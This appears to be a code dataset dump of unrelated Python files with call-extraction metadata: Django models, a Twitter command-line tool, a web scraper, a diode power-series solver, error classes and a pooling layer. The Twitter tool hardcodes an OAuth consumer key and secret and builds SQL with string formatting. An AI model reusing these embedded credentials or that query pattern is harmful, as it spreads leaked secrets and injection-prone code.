with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| [((23, 9, 23, 32), 'helpers.repository_dir.as_cwd', 'repository_dir.as_cwd', ({}, {}), '()', False, 'from helpers import repository_dir\n'), ((24, 17, 24, 54), 'logging.getLogger', 'logging.getLogger', ({(24, 35, 24, 53): '"""leapp.actor.test"""'}, {}), "('leapp.actor.test')", False, 'import logging\n'), ((25, 13, 25, 45), 'mock.patch.object', 'mock.patch.object', ({(25, 31, 25, 37): 'logger', (25, 39, 25, 44): '"""log"""'}, {}), "(logger, 'log')", False, 'import mock\n'), ((26, 25, 26, 74), 'leapp.repository.actor_definition.ActorDefinition', 'ActorDefinition', (), '', False, 'from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError\n'), ((36, 17, 36, 113), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((56, 17, 56, 58), 'pytest.raises', 'pytest.raises', ({(56, 31, 56, 57): 'ActorInspectionFailedError'}, {}), '(ActorInspectionFailedError)', False, 'import pytest\n'), ((61, 17, 61, 58), 'pytest.raises', 'pytest.raises', ({(61, 31, 61, 57): 'ActorInspectionFailedError'}, {}), '(ActorInspectionFailedError)', False, 'import pytest\n'), ((67, 17, 67, 51), 'pytest.raises', 'pytest.raises', ({(67, 31, 67, 50): 'MultipleActorsError'}, {}), '(MultipleActorsError)', False, 'import pytest\n'), ((37, 21, 37, 100), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((57, 21, 57, 96), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((62, 21, 62, 79), 'mock.patch', 'mock.patch', ({(62, 32, 62, 78): '"""leapp.repository.actor_definition.get_actors"""'}, {}), "('leapp.repository.actor_definition.get_actors')", False, 'import mock\n'), ((68, 21, 68, 117), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n'), ((31, 25, 31, 70), 'pytest.raises', 'pytest.raises', ({(31, 39, 31, 69): 'UnsupportedDefinitionKindError'}, {}), '(UnsupportedDefinitionKindError)', False, 'import pytest\n'), ((69, 25, 69, 110), 'mock.patch', 'mock.patch', (), '', False, 'import mock\n')] |
yeyuning1/iHome | iHome/house/models.py | aceb87d786ab66cf74ff47f549ec73388d21c9e3 | from django.db import models
# Create your models here.
from utils.models import BaseModel
class House(BaseModel):
    '''House information'''
user = models.ForeignKey('users.User', on_delete=models.CASCADE, verbose_name='房屋用户')
area = models.ForeignKey('address.Area', on_delete=models.SET_NULL, null=True, verbose_name='房屋地区')
title = models.CharField(max_length=64, null=False, verbose_name='房屋标题')
    price = models.IntegerField(default=0, verbose_name='房屋单价')  # unit price, stored in fen (cents)
address = models.CharField(max_length=512, default='', verbose_name='房屋地址')
room_count = models.SmallIntegerField(default=1, verbose_name='房间数目')
acreage = models.IntegerField(default=0, verbose_name='房屋面积')
    unit = models.CharField(max_length=32, default='', verbose_name='房屋单元')  # e.g. "X bedrooms, Y living rooms"
    capacity = models.SmallIntegerField(default=1, verbose_name='房屋容纳')  # how many people the house can hold
beds = models.CharField(max_length=64, default='', verbose_name='房屋床铺配置')
deposit = models.IntegerField(default=0, verbose_name='房屋押金')
min_days = models.SmallIntegerField(default=1, verbose_name='最少入住天数')
    max_days = models.SmallIntegerField(default=0, verbose_name='最大入住天数')  # 0 means no limit
order_count = models.IntegerField(default=0, verbose_name='预计该房屋的订单数')
index_image_url = models.CharField(max_length=500, default='', verbose_name='房屋主图片的路径')
    facilities = models.ManyToManyField('Facility')  # supporting facilities
class Meta:
db_table = 'ih_house_info'
verbose_name = '房屋信息'
verbose_name_plural = verbose_name
class Facility(models.Model):
    '''House facility information'''
name = models.CharField(max_length=32, verbose_name='设施名称')
class Meta:
db_table = 'ih_facility_info'
verbose_name = '设施信息'
verbose_name_plural = verbose_name
class HouseImage(BaseModel):
    '''House images'''
house = models.ForeignKey(House, verbose_name='房屋信息', on_delete=models.CASCADE)
url = models.CharField(max_length=256, null=False, verbose_name='房屋图片地址')
class Meta:
db_table = 'ih_house_image'
verbose_name = '房屋图片'
verbose_name_plural = verbose_name
| [((9, 11, 9, 97), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((10, 11, 10, 111), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((11, 12, 11, 84), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((12, 12, 12, 71), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((13, 14, 13, 87), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((14, 17, 14, 81), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((15, 14, 15, 73), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((16, 11, 16, 83), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((17, 15, 17, 79), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((18, 11, 18, 89), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((19, 14, 19, 73), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((20, 15, 20, 85), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((21, 15, 21, 85), 'django.db.models.SmallIntegerField', 'models.SmallIntegerField', (), '', False, 'from django.db import models\n'), ((22, 18, 22, 92), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((23, 22, 23, 107), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((24, 17, 24, 51), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ({(24, 40, 24, 50): '"""Facility"""'}, {}), "('Facility')", False, 'from django.db import models\n'), ((34, 11, 34, 71), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((44, 12, 44, 91), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((45, 10, 45, 89), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n')] |
Psycojoker/cltwit | cltwit/main.py | 3164f263df60d608da124ceb7d1e56bbdde7c930 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Cltwit is a command line twitter utility
Author : Jérôme Launay
Date : 2013
"""
import os
import sys
import re
import getopt
import gettext
import sqlite3
import webbrowser
import ConfigParser
from sqlite2csv import sqlite2csv
from cltwitdb import cltwitdb
from utils import LocalTimezone
from cltwitreport import TweetsReport
APP_NAME = 'cltwit'
LOC_PATH = os.path.dirname(__file__) + '/locale'
gettext.find(APP_NAME, LOC_PATH)
gettext.install(APP_NAME, LOC_PATH, True)
try:
import tweepy
except ImportError:
print(_("Veuillez installer tweetpy https://github.com/tweepy/tweepy"))
sys.exit()
# Directory for the config and the database
__cltwitdir__ = os.path.expanduser("~/.config/cltwit")
# Configuration file
__configfile__ = __cltwitdir__ + "/cltwit.conf"
# sqlite database and table
__dblocation__ = __cltwitdir__ + '/data.db'
__tablename__ = 'twitter'
__Local__ = LocalTimezone()
# colour handling for the terminal
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def has_colours(stream):
"""Vérifier la prise en charge des couleurs par le terminal"""
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
        return False  # auto colours only on a TTY
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
        # On error, assume no colour support
return False
__has_colours__ = has_colours(sys.stdout)
def printout(text, colour=WHITE):
"""Print en couleur"""
if __has_colours__:
seq = "\x1b[1;%dm" % (30 + colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text.encode("Utf-8"))
def checkdb():
""" Vérifier la présence de la bdd sqlite et la créer si absente """
if (not os.path.exists(__dblocation__)):
printout(_(u"Vous devez d'abord lancer la commande --database create \
pour créer une base de données de vos tweets."), RED)
sys.exit()
def checkconfig():
"""Récupérer la configuration ou la créer"""
    # Open the configuration file
config = ConfigParser.RawConfigParser()
try:
config.read(__configfile__)
if config.has_option('twitterapi', 'access_token'):
access_token = config.get('twitterapi', 'access_token')
if config.has_option('twitterapi', 'access_password'):
access_password = config.get('twitterapi', 'access_password')
except:
pass
auth = tweepy.OAuthHandler("Jus1rnqM6S0WojJfOH1kQ",
"AHQ5sTC8YYArHilXmqnsstOivY6ygQ2N27L1zBwk")
    # If there is no config yet, authorize the twitter connection via OAuth
if not(config.has_option('twitterapi', 'access_token') and
config.has_option('twitterapi', 'access_password')):
        # Open the web browser to retrieve the authorization code
while True:
try:
webbrowser.open(auth.get_authorization_url())
var = raw_input(_("Entrez le token !\n"))
auth.get_access_token(var)
except Exception, e:
print(str(e))
continue
break
var = auth.access_token
        # Extract the token and the password
access_password = str(var).split("&")[0].split("=")[1]
access_token = str(var).split("&")[1].split("=")[1]
        # Write the config file with the retrieved information
try:
cfgfile = open(__configfile__, 'w')
if not(config.has_section('twitterapi')):
config.add_section('twitterapi')
config.set('twitterapi', 'access_token', access_token)
config.set('twitterapi', 'access_password', access_password)
config.write(cfgfile)
except IOError:
pass
finally:
cfgfile.close()
    else:  # A configuration file already existed
auth.set_access_token(access_token, access_password)
return auth
def login():
""" Se connecter à l'api twitter via tweepy """
auth = checkconfig()
api = tweepy.API(auth)
    # Verify the api connection by fetching the user name
try:
twittername = api.me().screen_name
except Exception, e:
if 'Unable to get username' in (str(e)):
printout(_(u"Impossible de s'authentifier avec l'api Twitter.\
Fonctionne en mode déconnecté"), RED)
print("\n")
twittername = "offline_mode"
printout(_(u"Authentifié avec le user twitter {0}").format(twittername.decode('utf-8')), GREEN)
print("\n")
return api, auth, twittername
def get_friends_followers(api):
"""Renvoie la liste des id des friends et followers"""
friend_id = []
follower_id = []
printout(_(u"Récupération des Followers..."), YELLOW)
print("\n")
for follower in tweepy.Cursor(api.followers).items():
follower_id.append(follower.id)
printout((u"Récupération des Friends..."), YELLOW)
print("\n")
for friend in tweepy.Cursor(api.friends).items():
friend_id.append(friend.id)
return friend_id, follower_id
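    # Both lists contain numeric twitter user ids (not screen names)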
def get_diff(liste1, liste2):
"""Renvoie les objets de liste1 qui ne sont pas dans liste2"""
return list(set(liste1).difference(set(liste2)))
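    # e.g. get_diff([1, 2, 3], [2, 3]) -> [1] (order not guaranteed, sets are used)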
def follow_users(api, user):
"""Suivre une personne"""
try:
api.create_friendship(user)
printout(_(u"Vous suivez maintenant {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def unfollow_user(api, user):
"""Cesser de suivre une personne"""
try:
api.destroy_friendship(user)
printout(_(u"Vous ne suivez plus {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def main(argv=None):
""" Point d'entrée """
    # Create the directory for the config and the database if it does not exist
if not os.path.exists(__cltwitdir__):
os.makedirs(__cltwitdir__)
#~ twittername = "offline_mode"
    # Argument handling
if argv is None:
argv = sys.argv
if len(argv) == 1:
help()
try:
opts, args = getopt.getopt(sys.argv[1:], "r:ahfut:o:s:d:",
["report", "api", "help", "follow", "unfollow", "tweet=", "output=", "search=", "database="])
except getopt.GetoptError, err:
print(err)
help()
sys.exit()
    # Option handling
for option, value in opts:
if option in ('-a', '--api'):
api, auth, twittername = login()
res = api.rate_limit_status()
rtime = res['reset_time']
rhits = res['remaining_hits']
hlimit = res['hourly_limit']
from dateutil.parser import parse
drtime = parse(rtime)
printout(_("Informations sur l'utilisation de l'api Twitter"), YELLOW)
print("\n")
            # Convert the reset time returned by the Twitter API
            # to the local timezone
rlocaltime = drtime.astimezone(__Local__)
printout(_("Maximum d'appels par heure: "), BLUE)
            print(hlimit)
printout(_("Nombre d'appels restants: "), BLUE)
            print(rhits)
printout(_("Heure du prochain reset: "), BLUE)
            print(rlocaltime.strftime("%H:%M %Y-%m-%d"))
if option in ('-r', '--report'):
api, auth, twittername = login()
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
c.execute("select substr(date, 1,4) from twitter order by date asc limit 1")
dmois = c.fetchone()[0]
c.execute("select substr(date, 1,4) from twitter order by date desc limit 1")
fmois = c.fetchone()[0]
            # Query the data to export
dd = dict()
for a in range(int(dmois), int(fmois) + 1):
result = []
for m in range(1, 13):
mois = ('{num:02d}'.format(num=m))
c.execute("select count(*) from twitter where substr(date, 1,4) = '{0}' and substr(date, 6,2) = '{1}'".format(a, mois))
result.append(c.fetchone()[0])
dd[a] = result
c.close()
conn.close()
treport = TweetsReport(value)
# twittername = "offline"
treport.ecrireTitre(twittername)
nb = 0
for annee, donnees in dd.items():
nb += 1
if nb == 4:
treport.NextPage()
nb = 1
saut = 0
if nb == 1:
saut = 0
if nb == 2:
saut = 200
if nb == 3:
saut = 400
treport.ecrireLegende(saut, annee, donnees)
treport.addPie(saut, donnees)
treport.save()
printout(_(u"Report {0} créé !").format(value), GREEN)
print("\n")
sys.exit(0)
if option in ('-d', '--database'):
if value in ('u', 'update'):
                # Log in to the Twitter API
api, auth, twittername = login()
                # Update the tweets database
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Mise à jour de la base de données de {0}").format(twittername.decode('utf-8')), YELLOW)
print("\n")
nb = db.update(api, twittername)
printout(_(u"Ajout de {0} tweet(s) dans la base de données.").format(nb), GREEN)
if value in ('c', 'create'):
                # Log in to the Twitter API
api, auth, twittername = login()
                # Create the tweets database
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Création de la liste des tweets de ") + twittername.decode('utf-8'), YELLOW)
db.create(api, twittername)
printout(_(u"Base de données crée"), GREEN)
sys.exit()
#~ database_create(api,twittername)
if option in ("-o", "--output"):
            # Export to CSV
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
            # Query the data to export
c.execute('select date, tweet, url from {0} order by date desc'.format(__tablename__))
            # The sqlite2csv class handles the export
export = sqlite2csv(open(value, "wb"))
            # CSV file header
export.writerow(["Date", "Tweet", "URL"])
            # CSV file rows
export.writerows(c)
            # Close the sqlite cursor and connection
c.close()
conn.close()
printout(_(u"Fichier csv {0} créé.").format(value.decode('utf-8')), GREEN)
sys.exit()
if option in ("-s", "--search"):
            # Search for a pattern in the tweets database
checkdb()
printout(_(u"Recherche de {0} dans vos anciens tweets...")
.format(value.decode('utf-8')), YELLOW)
print("\n")
            # The search method returns tuples whose fields
            # contain the pattern
db = cltwitdb(__dblocation__, __tablename__)
results = db.search(value, "tweet")
for result in results:
print((u"{0} -> {1}\n{2}\n\n").format(result[1].decode('utf-8'), result[4].decode('utf-8'), result[2].decode('utf-8')))
if option in ("-u", "--unfollow"):
            # Log in to the Twitter API
api, auth, twittername = login()
            # Build the friend and follower lists (by id)
friend_id, follower_id = get_friends_followers(api)
            # Build the follow and unfollow lists
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# Un-follow
printout(_("Vous suivez {0} personnes qui ne vous suivent pas.")
.format(len(unfollow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in unfollow_liste:
printout(_("Voulez-vous cesser de suivre {0} ? (o/N)")
.format(api.get_user(user).screen_name), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
unfollow_user(api, user)
if option in ("-f", "--follow"):
            # Log in to the Twitter API
api, auth, twittername = login()
            # Build the friend and follower lists (by id)
friend_id, follower_id = get_friends_followers(api)
            # Build the follow and unfollow lists
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# follow
printout(_("{0} personnes vous suivent alors que vous ne les suivez pas.")
.format(len(follow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in follow_liste:
printout(_("Voulez-vous suivre {0} ? (o/N)"
.format(api.get_user(user).screen_name)), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
follow_users(api, user)
if option in ("-t", "--tweet"):
            # Log in to the Twitter API
api, auth, twittername = login()
            # Send a tweet; the length check below counts every URL as
            # 22 (http) or 23 (https) characters, matching t.co link wrapping
tweet_size = len(re.sub("https://\S*", "X"*23, re.sub("http://\S*", "X"*22, value)))
if tweet_size < 141:
api.update_status(value)
print("\n")
printout(_(u"Tweet envoyé !"), GREEN)
else:
printout(_(u"La limite pour un tweet est de 140 caractères, votre message \
fait {0} caractères de trop").format(str(tweet_size - 140).decode('utf-8')), RED)
sys.exit()
if option in ("-h", "--help"):
help()
def help():
printout(_(u"""
Usage :
cltwit [OPTIONS]
Options :
-f (--follow)
*Ajouter des personnes qui vous suivent et que vous ne suivez pas
-u (--unfollow)
*Cesser de suivre les personnes que vous suivez et qui \
vous ne suivent pas
-s (--search) MOTIF
*Search ( rechercher MOTIF dans vos anciens tweets)
-t (--tweet)
*Envoyer un tweet (message de 140 caractères maximum)
-o (--output) FILENAME.csv
*Exporter l'intégralité de vos tweets dans \
le fichier FILENAME.csv
-a (--api)
* Obtenir des informations sur l'utilisation de l'api twitter
-r (--report) FILENAME.pdf
* Générer un reporting format pdf avec la repartition des tweets par année et par mois
-d (--database) c|u
c (create)
*Créer ou récréer la base de données des tweets
u (update)
*Mettre à jour la base de données des tweets
"""), BLUE
)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
print("\n")
print(_(u"Merci d'avoir utilisé clitwit !"))
| [] |
lonsty/weibo-pic-spider-hd | weibo_image_spider/exceptions.py | c7dae38b51209296cc8e71aa6fb80f094d549198 | # @AUTHOR : lonsty
# @DATE : 2020/3/28 18:01
class CookiesExpiredException(Exception):
pass
class NoImagesException(Exception):
pass
class ContentParserError(Exception):
pass
class UserNotFound(Exception):
pass
| [] |
lilei644/python-learning-example | WebHtmlExample/WebHtmlExample.py | 71910a32bc8b3b8f23ba13babb583af453405bbe | import requests
from bs4 import BeautifulSoup
import re
# Set the request headers
# Use a regular browser User-Agent, the most common crawler setting
headers = {
"User-Agent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
# Fetch the weather forecast
def get_weather():
html = requests.get("http://www.weather.com.cn/weather/101280601.shtml", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
soup = BeautifulSoup(html.text, "lxml")
light_list = soup.select('p.tem span')
night_list = soup.select('p.tem i')
for index in range(0, len(light_list)):
            print('Daytime temperature: {0}, nighttime temperature: {1}'.format(light_list[index].get_text(), night_list[index].get_text()))
# Fetch the reply counts from the Tieba forum
def get_bar():
html = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=python3", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
# <span class="threadlist_rep_num center_text" title="回复">9</span>
tag_list = re.findall(r'(?<="回复">)\d*(?=</span>)', html.text)
print(tag_list)
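
# A minimal alternative sketch (an addition, not part of the original example):
# the same reply counts can be collected with a CSS selector instead of a regex,
# assuming the markup quoted in get_bar() ("span.threadlist_rep_num").
def get_bar_with_selector():
    html = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=python3", headers=headers)
    html.encoding = "utf-8"
    if html.status_code == 200:
        soup = BeautifulSoup(html.text, "lxml")
        # Each matching <span> holds one thread's reply count
        tag_list = [span.get_text() for span in soup.select("span.threadlist_rep_num")]
        print(tag_list)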
if __name__ == '__main__':
get_weather()
get_bar()
| [((13, 11, 13, 93), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((25, 11, 25, 88), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((16, 15, 16, 47), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(16, 29, 16, 38): 'html.text', (16, 40, 16, 46): '"""lxml"""'}, {}), "(html.text, 'lxml')", False, 'from bs4 import BeautifulSoup\n'), ((29, 19, 29, 73), 're.findall', 're.findall', ({(29, 30, 29, 61): '"""(?<="回复">)\\\\d*(?=</span>)"""', (29, 63, 29, 72): 'html.text'}, {}), '(\'(?<="回复">)\\\\d*(?=</span>)\', html.text)', False, 'import re\n')] |
JosepFanals/HELM | Codi/diode.py | feb579f37eb0850ba2a7acef18f8d3d78b9e599c | import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equivalent to E
R = 2 # equivalent to R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # series depth (number of terms kept)
Vd = np.zeros(n) # the power series
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # initialization of the series
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolution used to compute Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolution used to compute Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
for i in range(1, n): # compute the series coefficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # to see how the diode voltage evolves as more terms are summed
for j in range(n):
Vdfinal[j] = np.sum([Vd[:(j+1)]])
print(Vdfinal)
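
# Consistency check (added sketch, not part of the original script): the summed
# series should satisfy the two nonlinear relations used to seed the recursion,
# the diode law Vd = Vt*ln(1 + I/Is) and the constant-power load Vl*I = P.
print('diode law residual: ' + str(Vdf - Vt * math.log(1 + If / Is)))
print('power balance residual: ' + str(Vlf * If - P))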
| [((14, 5, 14, 16), 'numpy.zeros', 'np.zeros', ({(14, 14, 14, 15): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((15, 5, 15, 16), 'numpy.zeros', 'np.zeros', ({(15, 14, 15, 15): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((16, 5, 16, 16), 'numpy.zeros', 'np.zeros', ({(16, 14, 16, 15): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((52, 10, 52, 21), 'numpy.zeros', 'np.zeros', ({(52, 19, 52, 20): 'n'}, {}), '(n)', True, 'import numpy as np\n'), ((20, 13, 20, 37), 'math.log', 'math.log', ({(20, 22, 20, 36): '(1 + I1[0] / Is)'}, {}), '(1 + I1[0] / Is)', False, 'import math\n'), ((54, 17, 54, 37), 'numpy.sum', 'np.sum', ({(54, 24, 54, 36): '[Vd[:j + 1]]'}, {}), '([Vd[:j + 1]])', True, 'import numpy as np\n')] |
aljeshishe/ProxyBroker | proxybroker/errors.py | 195c050162275f63ebe033be765abec90601e3e1 | """Errors."""
class ProxyError(Exception):
pass
class NoProxyError(Exception):
pass
class ResolveError(Exception):
pass
class ProxyConnError(ProxyError):
pass
class ProxyRecvError(ProxyError): # connection_is_reset
pass
class ProxySendError(ProxyError): # connection_is_reset
pass
class ProxyTimeoutError(ProxyError):
pass
class ProxyEmptyResponseError(ProxyError):
pass
class BadStatusError(Exception): # BadStatusLine
pass
class BadResponseError(Exception):
pass
class BadStatusLine(Exception):
pass
class ErrorOnStream(Exception):
pass
| [] |
lvying1991/KBQA-System | questionanswering/models/pooling.py | 55e69c8320df3f7b199860afc76e8a0ab66f540e | import torch
from torch import nn as nn
from torch import autograd
class LogSumExpPooling1d(nn.Module):
"""Applies a 1D LogSumExp pooling over an input signal composed of several input planes.
LogSumExp is a smooth approximation of the max function.
Examples:
>>> m = LogSumExpPooling1d()
>>> input = autograd.Variable(torch.randn(4, 5, 10))
>>> m(input).squeeze()
"""
def __init__(self):
super(LogSumExpPooling1d, self).__init__()
    def forward(self, x):
        # Use the out-of-place exp() so the caller's tensor is not modified
        # (in-place exp_() would also fail on leaf tensors that require grad)
        x = x.exp()
        x = x.sum(dim=-1, keepdim=True)
        return x.log()
def __repr__(self):
return self.__class__.__name__ + '()'
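
# Usage sketch (an addition, not part of the original module). Recent PyTorch
# versions also provide torch.logsumexp, a numerically stabler built-in that
# computes the same quantity as the explicit exp/sum/log above.
if __name__ == "__main__":
    m = LogSumExpPooling1d()
    x = torch.randn(4, 5, 10)
    out = m(x.clone())                              # shape: (4, 5, 1)
    ref = torch.logsumexp(x, dim=-1, keepdim=True)  # built-in equivalent
    print(out.shape, torch.allclose(out, ref))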
| [] |